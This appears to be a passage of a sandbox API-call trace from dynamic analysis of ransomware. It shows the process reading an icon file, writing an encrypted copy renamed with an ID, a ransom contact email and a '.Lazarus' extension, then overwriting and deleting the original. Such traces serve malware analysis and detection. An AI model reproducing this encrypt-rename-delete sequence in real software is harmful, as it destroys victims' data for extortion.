dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0075.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0075.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0075.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0075.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0075.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0075.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0075.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0075.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0075.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0075.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x715b8 [0075.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0075.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0075.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0075.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0075.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0075.877] AreFileApisANSI () returned 1 [0075.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico", lpUsedDefaultChar=0x0) returned 40 [0075.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0075.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0075.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0075.877] AreFileApisANSI () returned 1 [0075.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0075.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0075.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x6d000, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 40 [0075.878] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.878] GetFileType (hFile=0x42c) returned 0x1 [0075.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0075.878] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0075.878] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0075.878] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0075.878] CloseHandle (hObject=0x42c) returned 1 [0075.879] AreFileApisANSI () returned 1 [0075.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0075.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0075.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x6d738, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 40 [0075.879] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.879] GetFileType (hFile=0x42c) returned 0x1 [0075.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0075.879] CloseHandle (hObject=0x42c) returned 1 [0075.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0075.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0075.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0075.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0075.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0075.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0075.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0075.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0075.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0075.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0075.880] AreFileApisANSI () returned 1 [0075.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0075.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0075.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x6d528, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 40 [0075.880] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e)) returned 1 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0075.880] AreFileApisANSI () returned 1 [0075.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0075.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0075.881] GetLastError () returned 0x0 [0075.881] SetLastError (dwErrCode=0x0) [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0075.881] GetLastError () returned 0x0 [0075.881] SetLastError (dwErrCode=0x0) [0075.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x693f0 [0075.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0075.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0075.881] AreFileApisANSI () returned 1 [0075.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0075.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xcc) returned 0x74a18 [0075.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x74a18, cchWideChar=102 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 102 [0075.881] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.882] GetFileType (hFile=0x42c) returned 0x1 [0075.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x74a18 | out: hHeap=0x20000) returned 1 [0075.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0075.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0075.882] AreFileApisANSI () returned 1 [0075.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0075.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0075.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x6cdf0, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 40 [0075.882] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.882] GetFileType (hFile=0x410) returned 0x1 [0075.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0075.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0075.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0075.883] GetLastError () returned 0x0 [0075.883] SetLastError (dwErrCode=0x0) [0075.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0075.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0075.883] GetLastError () returned 0x0 [0075.883] SetLastError (dwErrCode=0x0) [0075.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0075.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0075.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0075.883] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x47e, lpOverlapped=0x0) returned 1 [0075.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0075.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0075.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x92460 [0075.885] GetLastError () returned 0x0 [0075.885] SetLastError (dwErrCode=0x0) [0075.885] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0075.885] GetLastError () returned 0x0 [0075.885] SetLastError (dwErrCode=0x0) [0075.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d738 [0075.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0075.886] GetLastError () returned 0x0 [0075.886] SetLastError (dwErrCode=0x0) [0075.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0075.886] WriteFile (in: hFile=0x42c, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327ef70*=0x480, lpOverlapped=0x0) returned 1 [0075.887] GetLastError () returned 0x0 [0075.887] SetLastError (dwErrCode=0x0) [0075.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0075.887] GetLastError () returned 0x0 [0075.887] SetLastError (dwErrCode=0x0) [0075.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0075.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0075.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0075.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0075.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0075.887] CloseHandle (hObject=0x42c) returned 1 [0075.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0075.888] CloseHandle (hObject=0x410) returned 1 [0075.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0075.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0075.888] AreFileApisANSI () returned 1 [0075.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0075.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0075.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 40 [0075.888] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.889] GetFileType (hFile=0x410) returned 0x1 [0075.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0075.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0075.890] GetLastError () returned 0xb7 [0075.890] SetLastError (dwErrCode=0xb7) [0075.890] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0075.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0075.890] CloseHandle (hObject=0x410) returned 1 [0075.891] AreFileApisANSI () returned 1 [0075.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0075.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0075.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x6d0b0, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 40 [0075.891] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico")) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0075.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0075.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.892] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x1, dwReserved1=0x0, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0075.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: 